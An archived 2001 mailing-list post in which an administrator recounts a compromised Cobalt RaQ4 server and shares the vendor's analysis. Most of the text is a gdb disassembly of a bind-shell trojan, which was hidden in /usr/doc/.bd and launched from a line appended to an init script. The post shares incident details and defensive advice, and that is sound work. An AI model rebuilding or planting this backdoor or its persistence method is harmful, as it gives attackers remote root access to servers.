[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-users] RaQ4 -- Another Hacking Story
- Subject: [cobalt-users] RaQ4 -- Another Hacking Story
- From: "Bill" <bill@xxxxxxxxxxxxxxxxxxxx>
- Date: Thu Feb 15 12:05:00 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Hi List Members,
I wanted to throw my recent 'I've Been Hacked!' story onto the list.
Hopefully, this may help someone to avoid the pain of a server rebuild.
Luckily, we backup our data regularly.
This started about a week ago. One of our RaQ4s stopped responding to web
requests. I SSHd in and rebooted. Then telnet/ssh went down. Had to 'hard
boot' from the console. All seemed well, but I did a pstree command and
noted that httpd was not running. I attempted a restart and got an error
about httpd logs missing. In fact, the entire /var/log file was gone! So,
I peeked at out other RaQ4s to compare the log files and re-created these
missing logs from scratch. After that , httpd came up.
But, then, I noticed an alarmingly high instance of a process called .bd
when I did a pstree command. I'm talking, over 400 processes at this point
with a load average between 2.50 - 4.00 and CPU usage of 99.9%!!. Okay, I
knew something was up now. I did a locate command and found the file (see
Email to Cobalt below). I got rid of the file and the .bd process did not
come back. However, the hacker was not through. He began using our server
to scan other web servers, including one with the US Navy! When the Navy
calls and asks you to cut out the port scanning -- you just do it. So, we
rebuilt the server.
I've installed PortSentry and all patches are updated. I hope this never
happens again. I will tell you, if you do not yet backup your files on a
regular basis, I strongly urge you to start right away. If I had lost site
files for 200 customer web sites--- I can only imagine the 'pain' that would
cause..
Bill
------------------ Email To Cobalt ----------------------
Mark,
The following is a copy of the file, It was located in /usr/doc/.bd and
was being called from
vi /etc/rc.d/init.d/functions
from an additional line at the end of that file /usr/doc/.bd
The result of this file was that over 300 processes of .bd were running at
one time and the load average increased dramatically.
---------------- Email From Cobalt -------------------
Hi Bill!
Enclosed is a disassembly of the program that you sent me. I've got some
bad
news. It is indeed a trojan. Specifically it is a trojan that listens on
port
31337 that spawns a shell for any user connecting to that port. It looks
pretty simple and if you've ever done any 'C' programming the dump should be
pretty easy to follow. I would check you RaQ very carefully to be sure that
no
other backdoors are installed.
Good luck!
Mark.
(gdb) disassemble main
Dump of assembler code for function main:
0x8048ac4 <main>: push %ebp
0x8048ac5 <main+1>: mov %esp,%ebp
0x8048ac7 <main+3>: sub $0x201c,%esp
0x8048acd <main+9>: call 0x8048a08 <geteuid>
0x8048ad2 <main+14>: mov %eax,%eax
0x8048ad4 <main+16>: test %eax,%eax
0x8048ad6 <main+18>: jne 0x8048b0b <main+71>
0x8048ad8 <main+20>: incl 0x804a1b0
0x8048ade <main+26>: push $0x80490c0
0x8048ae3 <main+31>: call 0x8048988 <getpwnam>
0x8048ae8 <main+36>: add $0x4,%esp
0x8048aeb <main+39>: mov %eax,%eax
0x8048aed <main+41>: mov %eax,0xffffffe4(%ebp)
0x8048af0 <main+44>: cmpl $0x0,0xffffffe4(%ebp)
0x8048af4 <main+48>: je 0x8048b0b <main+71>
0x8048af6 <main+50>: mov 0xffffffe4(%ebp),%eax
0x8048af9 <main+53>: mov 0x8(%eax),%edx
0x8048afc <main+56>: mov %edx,0x804a1b4
0x8048b02 <main+62>: push %edx
0x8048b03 <main+63>: call 0x8048858 <seteuid>
0x8048b08 <main+68>: add $0x4,%esp
0x8048b0b <main+71>: call 0x8048838 <fork>
0x8048b10 <main+76>: mov %eax,%eax
0x8048b12 <main+78>: test %eax,%eax
0x8048b14 <main+80>: je 0x8048b20 <main+92>
0x8048b16 <main+82>: push $0x0
0x8048b18 <main+84>: call 0x8048998 <exit>
0x8048b1d <main+89>: add $0x4,%esp
0x8048b20 <main+92>: mov 0xc(%ebp),%eax
0x8048b23 <main+95>: mov (%eax),%edx
0x8048b25 <main+97>: push %edx
0x8048b26 <main+98>: call 0x80488d8 <strlen>
0x8048b2b <main+103>: add $0x4,%esp
0x8048b2e <main+106>: mov %eax,%eax
0x8048b30 <main+108>: push %eax
0x8048b31 <main+109>: push $0x20
0x8048b33 <main+111>: mov 0xc(%ebp),%eax
0x8048b36 <main+114>: mov (%eax),%edx
0x8048b38 <main+116>: push %edx
0x8048b39 <main+117>: call 0x80489d8 <memset>
0x8048b3e <main+122>: add $0xc,%esp
0x8048b41 <main+125>: push $0x80490c5
0x8048b46 <main+130>: mov 0xc(%ebp),%eax
0x8048b49 <main+133>: mov (%eax),%edx
0x8048b4b <main+135>: push %edx
0x8048b4c <main+136>: call 0x8048a18 <strcpy>
0x8048b51 <main+141>: add $0x8,%esp
0x8048b54 <main+144>: push $0x0
0x8048b56 <main+146>: push $0x1
0x8048b58 <main+148>: push $0x2
0x8048b5a <main+150>: call 0x80489f8 <socket>
0x8048b5f <main+155>: add $0xc,%esp
0x8048b62 <main+158>: mov %eax,%eax
0x8048b64 <main+160>: mov %eax,0xfffffffc(%ebp)
0x8048b67 <main+163>: cmpl $0x0,0xfffffffc(%ebp)
0x8048b6b <main+167>: jge 0x8048b6d <main+169>
0x8048b6d <main+169>: push $0x10
0x8048b6f <main+171>: lea 0xffffffe8(%ebp),%eax
0x8048b72 <main+174>: push %eax
0x8048b73 <main+175>: call 0x8048978 <bzero>
0x8048b78 <main+180>: add $0x8,%esp
0x8048b7b <main+183>: movw $0x2,0xffffffe8(%ebp)
0x8048b81 <main+189>: push $0xc97
0x8048b86 <main+194>: call 0x80489b8 <htons>
0x8048b8b <main+199>: add $0x4,%esp
0x8048b8e <main+202>: mov %eax,%eax
0x8048b90 <main+204>: mov %ax,0xffffffea(%ebp)
0x8048b94 <main+208>: push $0x0
---Type <return> to continue, or q <return> to quit---
0x8048b96 <main+210>: call 0x8048868 <htonl>
0x8048b9b <main+215>: add $0x4,%esp
0x8048b9e <main+218>: mov %eax,%eax
0x8048ba0 <main+220>: mov %eax,0xffffffec(%ebp)
0x8048ba3 <main+223>: push $0x10
0x8048ba5 <main+225>: lea 0xffffffe8(%ebp),%edx
0x8048ba8 <main+228>: mov %edx,%eax
0x8048baa <main+230>: push %eax
0x8048bab <main+231>: mov 0xfffffffc(%ebp),%eax
0x8048bae <main+234>: push %eax
0x8048baf <main+235>: call 0x8048938 <bind>
0x8048bb4 <main+240>: add $0xc,%esp
0x8048bb7 <main+243>: mov %eax,%eax
0x8048bb9 <main+245>: test %eax,%eax
0x8048bbb <main+247>: jge 0x8048bbd <main+249>
0x8048bbd <main+249>: push $0x5
0x8048bbf <main+251>: mov 0xfffffffc(%ebp),%eax
0x8048bc2 <main+254>: push %eax
0x8048bc3 <main+255>: call 0x80488a8 <listen>
0x8048bc8 <main+260>: add $0x8,%esp
0x8048bcb <main+263>: mov %eax,%eax
0x8048bcd <main+265>: test %eax,%eax
0x8048bcf <main+267>: jge 0x8048bd1 <main+269>
0x8048bd1 <main+269>: nop
0x8048bd2 <main+270>: mov %esi,%esi
0x8048bd4 <main+272>: push $0x0
0x8048bd6 <main+274>: xor %eax,%eax
0x8048bd8 <main+276>: push %eax
0x8048bd9 <main+277>: mov 0xfffffffc(%ebp),%eax
0x8048bdc <main+280>: push %eax
0x8048bdd <main+281>: call 0x8048888 <accept>
0x8048be2 <main+286>: add $0xc,%esp
0x8048be5 <main+289>: mov %eax,%eax
0x8048be7 <main+291>: mov %eax,0xfffffff8(%ebp)
0x8048bea <main+294>: cmpl $0x0,0xfffffff8(%ebp)
0x8048bee <main+298>: jge 0x8048bf8 <main+308>
0x8048bf0 <main+300>: jmp 0x8048cb4 <main+496>
0x8048bf5 <main+305>: lea 0x0(%esi),%esi
0x8048bf8 <main+308>: call 0x8048838 <fork>
0x8048bfd <main+313>: mov %eax,%eax
0x8048bff <main+315>: test %eax,%eax
0x8048c01 <main+317>: je 0x8048ca8 <main+484>
0x8048c07 <main+323>: push $0x0
0x8048c09 <main+325>: mov 0xfffffff8(%ebp),%eax
0x8048c0c <main+328>: push %eax
0x8048c0d <main+329>: call 0x8048918 <dup2>
0x8048c12 <main+334>: add $0x8,%esp
0x8048c15 <main+337>: push $0x1
0x8048c17 <main+339>: mov 0xfffffff8(%ebp),%eax
0x8048c1a <main+342>: push %eax
0x8048c1b <main+343>: call 0x8048918 <dup2>
0x8048c20 <main+348>: add $0x8,%esp
0x8048c23 <main+351>: push $0x2
0x8048c25 <main+353>: mov 0xfffffff8(%ebp),%eax
0x8048c28 <main+356>: push %eax
0x8048c29 <main+357>: call 0x8048918 <dup2>
0x8048c2e <main+362>: add $0x8,%esp
0x8048c31 <main+365>: mov 0xfffffff8(%ebp),%eax
0x8048c34 <main+368>: push %eax
0x8048c35 <main+369>: call 0x8048818 <close>
0x8048c3a <main+374>: add $0x4,%esp
0x8048c3d <main+377>: lea 0xffffdfe4(%ebp),%eax
0x8048c43 <main+383>: push %eax
0x8048c44 <main+384>: call 0x8048878 <gets>
0x8048c49 <main+389>: add $0x4,%esp
0x8048c4c <main+392>: lea 0xffffdfe4(%ebp),%eax
0x8048c52 <main+398>: push %eax
0x8048c53 <main+399>: call 0x80488d8 <strlen>
0x8048c58 <main+404>: add $0x4,%esp
---Type <return> to continue, or q <return> to quit---
0x8048c5b <main+407>: mov %eax,%eax
0x8048c5d <main+409>: lea 0xffffffff(%eax),%edx
0x8048c60 <main+412>: lea 0xffffdfe4(%ebp),%eax
0x8048c66 <main+418>: movb $0x0,(%edx,%eax,1)
0x8048c6a <main+422>: lea 0xffffdfe4(%ebp),%eax
0x8048c70 <main+428>: push %eax
0x8048c71 <main+429>: push $0x80490cf
0x8048c76 <main+434>: call 0x8048808 <strcmp>
0x8048c7b <main+439>: add $0x8,%esp
0x8048c7e <main+442>: mov %eax,%eax
0x8048c80 <main+444>: test %eax,%eax
0x8048c82 <main+446>: jne 0x8048c9d <main+473>
0x8048c84 <main+448>: push $0x2000
0x8048c89 <main+453>: lea 0xffffdfe4(%ebp),%eax
0x8048c8f <main+459>: push %eax
0x8048c90 <main+460>: call 0x8048978 <bzero>
0x8048c95 <main+465>: add $0x8,%esp
0x8048c98 <main+468>: call 0x8048dac <run_shell>
0x8048c9d <main+473>: push $0x0
0x8048c9f <main+475>: call 0x8048998 <exit>
0x8048ca4 <main+480>: add $0x4,%esp
0x8048ca7 <main+483>: nop
0x8048ca8 <main+484>: mov 0xfffffff8(%ebp),%eax
0x8048cab <main+487>: push %eax
0x8048cac <main+488>: call 0x8048818 <close>
0x8048cb1 <main+493>: add $0x4,%esp
0x8048cb4 <main+496>: jmp 0x8048bd4 <main+272>
0x8048cb9 <main+501>: lea 0x0(%esi),%esi
0x8048cbc <main+504>: push $0x0
0x8048cbe <main+506>: call 0x8048998 <exit>
0x8048cc3 <main+511>: add $0x4,%esp
0x8048cc6 <main+514>: mov %esi,%esi
0x8048cc8 <main+516>: leave
0x8048cc9 <main+517>: ret
0x8048cca <main+518>: mov %esi,%esi
End of assembler dump.
(gdb) disassemble run_shell
Dump of assembler code for function run_shell:
0x8048dac <run_shell>: push %ebp
0x8048dad <run_shell+1>: mov %esp,%ebp
0x8048daf <run_shell+3>: sub $0x2000,%esp
0x8048db5 <run_shell+9>: push $0x804912f
0x8048dba <run_shell+14>: call 0x80488c8 <chdir>
0x8048dbf <run_shell+19>: add $0x4,%esp
0x8048dc2 <run_shell+22>: mov %esi,%esi
0x8048dc4 <run_shell+24>: call 0x8048ccc <show_prompt>
0x8048dc9 <run_shell+29>: lea 0xffffe000(%ebp),%eax
0x8048dcf <run_shell+35>: push %eax
0x8048dd0 <run_shell+36>: call 0x8048878 <gets>
0x8048dd5 <run_shell+41>: add $0x4,%esp
0x8048dd8 <run_shell+44>: lea 0xffffe000(%ebp),%eax
0x8048dde <run_shell+50>: push %eax
0x8048ddf <run_shell+51>: call 0x80488d8 <strlen>
0x8048de4 <run_shell+56>: add $0x4,%esp
0x8048de7 <run_shell+59>: mov %eax,%eax
0x8048de9 <run_shell+61>: lea 0xffffffff(%eax),%edx
0x8048dec <run_shell+64>: lea 0xffffe000(%ebp),%eax
0x8048df2 <run_shell+70>: movb $0x0,(%edx,%eax,1)
0x8048df6 <run_shell+74>: push $0x0
0x8048df8 <run_shell+76>: call 0x8048858 <seteuid>
0x8048dfd <run_shell+81>: add $0x4,%esp
0x8048e00 <run_shell+84>: lea 0xffffe000(%ebp),%eax
0x8048e06 <run_shell+90>: push %eax
0x8048e07 <run_shell+91>: call 0x8048e24 <execute>
0x8048e0c <run_shell+96>: add $0x4,%esp
0x8048e0f <run_shell+99>: mov 0x804a1b4,%eax
0x8048e14 <run_shell+104>: push %eax
0x8048e15 <run_shell+105>: call 0x8048858 <seteuid>
0x8048e1a <run_shell+110>: add $0x4,%esp
0x8048e1d <run_shell+113>: jmp 0x8048dc4 <run_shell+24>
0x8048e1f <run_shell+115>: nop
0x8048e20 <run_shell+116>: leave
0x8048e21 <run_shell+117>: ret
0x8048e22 <run_shell+118>: mov %esi,%esi
End of assembler dump.
(gdb)